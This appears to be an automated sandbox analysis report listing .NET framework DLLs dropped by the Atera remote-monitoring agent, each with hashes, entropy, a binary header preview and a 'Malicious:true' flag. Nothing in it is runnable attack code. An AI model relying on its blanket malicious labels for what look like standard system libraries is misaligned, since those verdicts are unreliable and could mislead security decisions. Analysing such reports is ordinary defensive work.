                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ..............................*e....@.................................t)..O....@..P...............0(...`......<(............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................)......H.......P ..l....................'......................................BSJB............v4.0.30319......l.......#~..........#Strings....@.......#US.D.......#GUID...T.......#Blob......................3..................................................K...d.K...8.8...k.....L.................K.................c...........5.........................2.....2.....2...).2...1.2...9.2...A.2...I.2...Q.2...Y.2...a.2...i.2...q.2.......................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Overlapped.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):31792
                                                                                                                                                                                                                                        Entropy (8bit):6.537336955673988
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:Xu5I+sqOylryry8qqIfUc7a5FEpYinAMxCGDh:XYIVBpry8qqIfUcm5e7HxHDh
                                                                                                                                                                                                                                        MD5:CA48177CFBAAFB80752B689E20BABBF1
                                                                                                                                                                                                                                        SHA1:AF58FA81B11BEF5230F11B3FC0FAE27A9EED84CF
                                                                                                                                                                                                                                        SHA-256:78FCE2D61B3F8108CE1AB3F707EEFFDB20B57152C0232777966FC2052912D5DC
                                                                                                                                                                                                                                        SHA-512:D1D22555134487044EA748F30BD7E6A81F24C98BE4E13E01B3910464C705BEB9421B7B44E7F68DC05E19DCF788A87F470A59FEA187396C1759F54065F976E0AC
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..F...........d... ........... ..............................Ne....@..................................c..O.......x............T..0(...........c............................................... ............... ..H............text....D... ...F.................. ..`.rsrc...x............H..............@..@.reloc...............R..............@..B.................c......H........&...7...........^.......b......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*2rK..p.(....*2ry..p.(....*2r...p.(....*2r...p.(....*2rc..p.(....*......(....*..0..;........|....(......./......(....o....s

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Tasks.Parallel.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.8748413710554495
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:gvn4HREpWiQWRNyb8E9VF6IYinAM+oCeWD6Lbc:3SLEpYinAMxCp
                                                                                                                                                                                                                                        MD5:7593FE4FFADE8375016FC24FA75A124B
                                                                                                                                                                                                                                        SHA1:8B765B636F47699C61966581658592019E3AC6C4
                                                                                                                                                                                                                                        SHA-256:A750DD59F7D9D19CEB1B405077D88FD3D63F07AC471731964F59C2396A0C533C
                                                                                                                                                                                                                                        SHA-512:A4B0F7B8134801BC771A4BC88D48B40CF9883C0B555134B4C65C966064B5FEE90DF7AF9044B58F84FB593AC76AEA1169BFCE9DDA66E7B3EA94F5F40A123E0A50
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ..............................:.....@..................................(..O....@..P...............0(...`......x'............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......l...#Strings....|.......#US.........#GUID...........#Blob......................3......................................................n.....B.....".....V.................U...........$.....m...........?.....(...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.!...C.<...K.\...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Tasks.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16432
                                                                                                                                                                                                                                        Entropy (8bit):6.774247704930313
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:98MjKb47T3UCcqFMkJ59WdtW0Nyb8E9VF6IYinAM+oCowQA1vM:GMjKb4vcGdOfEpYinAMxCAA1U
                                                                                                                                                                                                                                        MD5:A35A30B12348BA5E05B6FB159C563A7A
                                                                                                                                                                                                                                        SHA1:A67E4721114CC284D4EE2161B54BD65BE8838732
                                                                                                                                                                                                                                        SHA-256:C80EF950CBB2E2AE4E9430E6EA108DB3363E65ED38E8B016697D22C277F1718B
                                                                                                                                                                                                                                        SHA-512:16FED055DF80510D2564AADB18092A48725D64CCFE22E09EE546CB0EC0606FB0458A14FADD1D6044AA9E553190A90D41B72F356DFAD2927520334443AC717F45
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............,... ...@....... ...............................4....@.................................`,..O....@..................0(...`......(+............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................,......H.......P ..X....................*......................................BSJB............v4.0.30319......l...<...#~..........#Strings....4.......#US.8.......#GUID...H.......#Blob......................3................................!.....O.......................................].....z.............................7.......j...........n...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Thread.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.853352008212058
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:LxzyNXd4+BW6FW9Nyb8E9VF6IYinAM+oCDYhYiKm:wzKEpYinAMxCcl
                                                                                                                                                                                                                                        MD5:7EBB896ED8D94BA34011FDB83579A930
                                                                                                                                                                                                                                        SHA1:63E1E9C4345D9F62F2F2CFA62D4682275800AD25
                                                                                                                                                                                                                                        SHA-256:FB1A1AC8A0325C137FB6C6528E03EABE16FE579C48F7B0572A0038C67B961083
                                                                                                                                                                                                                                        SHA-512:E6C8FC288936E849FD34DD53C39D1ED221E68877AFC3D51FA75956AA3D664B4A8C9DABF9381F5645CDF4C543D5F9102043259E9D77C2129FD4E7B2CA7B4EDF3C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ....................................@..................................(..O....@..................0(...`.......'............................................... ............... ..H............text... .... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P .......................'......................................BSJB............v4.0.30319......l.......#~..,...p...#Strings............#US.........#GUID...........#Blob......................3..................................................'.....'...T.....G.....h.................g...........6.................Q.....:...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.4...K.T...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.ThreadPool.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.862515945758667
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:8vs2Q3HKJNrWWRWS6Nyb8E9VF6IYinAM+oCm86DVYp:8uMmEpYinAMxCPuVYp
                                                                                                                                                                                                                                        MD5:73471841E080DD85920871105EB76D3C
                                                                                                                                                                                                                                        SHA1:A01C4C31162919DA9489DB5F26DFD740019F1D69
                                                                                                                                                                                                                                        SHA-256:A768CF40C860A92A2C9C7DB1D9D5B15708C01D14AC6EB6C42EC47A6E520E8000
                                                                                                                                                                                                                                        SHA-512:3247093C549594605AD3D6E1FACDA4BD4F47FDC3B12475B5302083B58C6FF3757EEBD54CFE36627CBECD1C9AC07F74E72758A802E5B9DDC473F39AE9A8F57A8C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............(... ...@....... ...............................9....@..................................(..O....@..4...............0(...`......h'............................................... ............... ..H............text........ ...................... ..`.rsrc...4....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......`...#Strings....p.......#US.t.......#GUID...........#Blob......................3................................................../...q./...E.....O.....Y.................X...........'.....p...........B.....+...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.8...K.X...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Timer.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.827884602631064
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:yFz0Q6gcqRhcsMWdMWtNyb8E9VF6IYinAM+oC9JtVeCM:yFz1c6jEpYinAMxCLKCM
                                                                                                                                                                                                                                        MD5:0163F439542B0F429D38F8C5F11AB553
                                                                                                                                                                                                                                        SHA1:19B75CBD6BE631B908B6DA2257CF157D64F24495
                                                                                                                                                                                                                                        SHA-256:22CC23E704A625F0778AE9785319BB5EF0CF2C76325AB972609B7BED14938D08
                                                                                                                                                                                                                                        SHA-512:3C60B4F0A6B746C024336683799D79A53D22E1A525BCCE9FD5893731787BF2EFCF9B8328941F92C518706B2129082FBBC993E4FCD5B1025AD81A145B1EE0A0FF
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............(... ...@....... ..............................#.....@.................................L(..O....@..................0(...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P ..D....................&......................................BSJB............v4.0.30319......l.......#~......,...#Strings.... .......#US.$.......#GUID...4.......#Blob......................3......................................................\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16432
                                                                                                                                                                                                                                        Entropy (8bit):6.72146155788329
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:q6xWA3W4aW/NWgNyb8E9VF6IYinAM+oCIJTOF:qaBbEpYinAMxCb
                                                                                                                                                                                                                                        MD5:1B6967DF51A28EF4C6BF9200D0DC8F6B
                                                                                                                                                                                                                                        SHA1:4038087307E3AE7538C8352E7BC18A5FD3E219E8
                                                                                                                                                                                                                                        SHA-256:BDED189EF167AA4D3F9D79C7A859D0E3C25D3374E1FDDB26758522133BC0FBBC
                                                                                                                                                                                                                                        SHA-512:F352B617C6F0D385B9D2E110A310BDBEEDBC2F2B978949F854A6D9B19CB3925DA48A7467DBB8C6450F32ECBC0F92D3A11D861559884D912B822BDFBB0FCB417F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............,... ...@....... ..............................^t....@..................................+..O....@..................0(...`.......*............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................+......H.......P .......................*......................................BSJB............v4.0.30319......l... ...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................-.........O.k.....k.....X.....................1...........o.........................B...........9...........J.....J.....J...).J...1.J...9.J...A.J...I.J...Q.J...Y.J...a.J...i.J...q.J.......................#.....+.....3.....;.....C.-...K.M...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ValueTuple.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):73264
                                                                                                                                                                                                                                        Entropy (8bit):5.95534184969142
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:h784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRT:h7N1r9KGI04CCARLT
                                                                                                                                                                                                                                        MD5:B810DC7054B683366C39DB3C68F04F7B
                                                                                                                                                                                                                                        SHA1:014B5F1A6A1DE8172BCEA4B025A3161AB5BA3A44
                                                                                                                                                                                                                                        SHA-256:E80F800AB85D8E9FB1ED5E541E3E5617D2F4AE7CFF58804C1CDDF64FDBF64431
                                                                                                                                                                                                                                        SHA-512:9A471F0D9E0EA6C4A898E7D47BCCBC2AE614C942A5A53CB17DF1846403B6157C993C59237A8A7572349018F4DE58EA3830BBB30B4BF368D430AF60E32ABCE86D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.Z.........." ..0.................. ... ....... .......................`.......Z....@.....................................O.... ..P...............0(...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B........................H.......$...h...........................................................6..o.........*f..o...........o.........*...o...........o...........o.........*...o...........o ..........o!...........o"........*...o#..........o$..........o%...........o&...........o'........*....0..L.........o(..........o)..........o*...........o+...........o,...........o-........*.0..Y.........o...........o/..........o0...........o1...........o2...........o3...........o4.... ...*....0..k.........o5....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.ReaderWriter.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15920
                                                                                                                                                                                                                                        Entropy (8bit):6.853619147211277
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Wr97WquWeNyb8E9VF6IYinAM+oCkp9Kbs:WRJWEpYinAMxCeb
                                                                                                                                                                                                                                        MD5:AED9C71AD86BF0F3CF92A98827956EFF
                                                                                                                                                                                                                                        SHA1:C77E1CF1F57A316D29465971056C6DED650419AC
                                                                                                                                                                                                                                        SHA-256:BD01AEBE7C4FA2CE93D8FAF8822582C41F307275DCC60FF1C8B445CB7E640DE5
                                                                                                                                                                                                                                        SHA-512:C0A357336DE4623527BFE1CC8B098C001CAFDAAF4913CD18F14FE9C623B677FF7554852540A700387D51596593124EC47739434CD91071E989040341A8BBBBE5
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............+... ...@....... ..............................dn....@.................................\+..O....@..................0(...`......$*............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................+......H.......P ..T....................)......................................BSJB............v4.0.30319......l.......#~..T.......#Strings....0.......#US.4.......#GUID...D.......#Blob......................3......................................z...........j.....j.....W...............B.....z.............................................................Q.....Q.....Q...).Q...1.Q...9.Q...A.Q...I.Q...Q.Q...Y.Q...a.Q...i.Q...q.Q.......................#.....+.....3.....;.....C.4...K.T...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XDocument.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15920
                                                                                                                                                                                                                                        Entropy (8bit):6.794476772281384
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cjh2uxSleWLDW528BNyby2sE9jBF6IYiYF8pA5K+oCGUHFMslQ/:q16eWLDW1Nyb8E9VF6IYinAM+oC4D/
                                                                                                                                                                                                                                        MD5:AC3E06E0163098D50D9621FB59D10BFD
                                                                                                                                                                                                                                        SHA1:6A02C8D6263A26FA6C09F8E58A97D8C854BA1974
                                                                                                                                                                                                                                        SHA-256:9D1F390541E7E7CC9622EAE0D68D0E7A365A65475B25B20613A7EA84598376D3
                                                                                                                                                                                                                                        SHA-512:D7AB3FAF2E9D2DE9C5C7FA673BEE155B6ADD81D72A32F81448DE2282B8F22C1E11FE3BEF5C8678777D73E31DAAE0535C8EFADEF6B2323D5125E4A535B87C96AB
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............*... ...@....... ...............................n....@.................................|*..O....@..................0(...`......D)............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P ..t....................(......................................BSJB............v4.0.30319......l.......#~......8...#Strings....T.......#US.X.......#GUID...h.......#Blob......................3..................................................z.....z...u.g.................................>.....W.................r.....[...................a.....a.....a...).a...1.a...9.a...A.a...I.a...Q.a...Y.a...a.a...i.a...q.a.......................#.....+.....3.....;.....C.1...K.Q...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XPath.XDocument.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16944
                                                                                                                                                                                                                                        Entropy (8bit):6.785165019486056
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:T8G4YC2W+wW8WpwW3Nyb8E9VF6IYinAM+oCPuq:wGZ5ZEpYinAMxCN
                                                                                                                                                                                                                                        MD5:58976034EAC709E05B03CA0B3B520F20
                                                                                                                                                                                                                                        SHA1:4ED412379D6CECC6596F8F31923D905D82B24B64
                                                                                                                                                                                                                                        SHA-256:100E35546DB8A7C92CFCF8D7E814A33B3B38D48AD9757A113E23B2888BAA4225
                                                                                                                                                                                                                                        SHA-512:FBAE6F4A4F6EC679E1B13C798AF1C17696DA1073ED321F02EF7ED0E7CFA821F0F0BFDB6B485D0BBE4497E250CEADC7C1B682DAA61192C486C29B4807446F1AD7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............+... ...@....... ..............................9.....@.................................z+..O....@..x...............0(...`.......*............................................... ............... ..H............text........ ...................... ..`.rsrc...x....@......................@..@.reloc.......`......................@..B.................+......H.......t ......................P*........................................s....*:.(......}....*2.{....(....*BSJB............v4.0.30319......l.......#~..0.......#Strings............#US.........#GUID...........#Blob...........WW.........3..............................................................L.........4.H...}.H...u.v...........;...........;...=.;.................../.%...........P.....m.....................................v...S.......v...d.v...........v...m...............

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XPath.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.899058511351578
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:M6ziqTEkGWvRWpNyb8E9VF6IYinAM+oCKPnYe:MYT1yEpYinAMxC0Ye
                                                                                                                                                                                                                                        MD5:57078D673B07AB2185173F352190C235
                                                                                                                                                                                                                                        SHA1:B17BD3197C3D65EFD83A18B8F09A2EB1C315D21F
                                                                                                                                                                                                                                        SHA-256:BE8703E8549EA343D78DE7BA0F0EF13E6CD559C49955044AA917B55541D5202C
                                                                                                                                                                                                                                        SHA-512:768B09514F8B4CED74E6933D8A7AE705DCCD752F05A8EADCFE99C75920408A0F5DD196657FDA1B9F340A9A8219C078CD21A0BA4E19D50B44B13315210888B32C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ...............................m....@..................................)..O....@..................0(...`......d(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l...0...#~..........#Strings....x.......#US.|.......#GUID...........#Blob......................3................................................'...........~...................................G.....`.................{.....d...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.-...K.M...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XmlDocument.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15920
                                                                                                                                                                                                                                        Entropy (8bit):6.810619804319302
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:lUv7c7iWNCW9Nyb8E9VF6IYinAM+oCIL1LZt:lM7c1VEpYinAMxC0F
                                                                                                                                                                                                                                        MD5:1BFF387D9F5BFEEEE4319871EBFFEF84
                                                                                                                                                                                                                                        SHA1:2332D3CECECAF5DA3EEA77CA8E46509E35885B95
                                                                                                                                                                                                                                        SHA-256:3419A5024F04B35A9DC4B3F47B7298F91E5ED75EEC32BDBFDCAF9DBD284446A5
                                                                                                                                                                                                                                        SHA-512:62E29623AB42F1C12D16D81F42EB8D117680192E3D49F7F243B749EE05062CB644307B66402CBFDAE8AA1B69A4ED5C6A6CEF58D92479AD07C1DEA3417ACC041E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C..Y.........." ..0..............*... ...@....... ..............................1.....@..................................*..O....@..................0(...`......`)............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P .......................(......................................BSJB............v4.0.30319......l.......#~......l...#Strings....l.......#US.p.......#GUID...........#Blob......................3................................................4...........~.............H.....H.....H.....H...T.H...m.H.....H.....H.........d.H.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XmlSerializer.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15920
                                                                                                                                                                                                                                        Entropy (8bit):6.85218850025618
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:G+vxmNWnRW5x+Nyby2sE9jBF6IYiYF8pA5K+oCGUHF8C8cA/z6HSLo:HSWnRWmNyb8E9VF6IYinAM+oCIj/z6T
                                                                                                                                                                                                                                        MD5:0DB58E596FE39F8BE1B3E1B0BCC7B63B
                                                                                                                                                                                                                                        SHA1:088172606BA618FFEFED1FC6F2C1F84BF67C2189
                                                                                                                                                                                                                                        SHA-256:92E3FC8AF59B3323D025CF2FB7AE00AAB9A7B91DB8C737E3A2FA0C3E76A0FAEA
                                                                                                                                                                                                                                        SHA-512:1FF2C9B0367B6CAA410755D8F0B5A40CD89976E4E79F913CFE528593107D4A55B4B54DFE50A628E72957B137F53D16363F10EF45E0A129673B0EC0CA9912002D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C..Y.........." ..0..............+... ...@....... ..............................F.....@.................................L+..O....@..$...............0(...`.......*............................................... ............... ..H............text........ ...................... ..`.rsrc...$....@......................@..@.reloc.......`......................@..B.................+......H.......P ..D....................)......................................BSJB............v4.0.30319......l.......#~..........#Strings.... .......#US.$.......#GUID...4.......#Blob......................3..................................................k.....k...U.@.........i.....=.........................................&.....'...................:.....:.....:...).:...1.:...9.:...A.:...I.:...Q.:...Y.:...a.:...i.:...q.:.......................#.....+.....3.....;.....C.5...K.U...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\netstandard.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):92720
                                                                                                                                                                                                                                        Entropy (8bit):5.48315242734429
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:w2Ec05j4eAH64rh5fSt5T9nFcI94WX7HxR:HlK4eA7mDmWXH
                                                                                                                                                                                                                                        MD5:DD3F6AE7E0F87A462F2FE0F30CA2B843
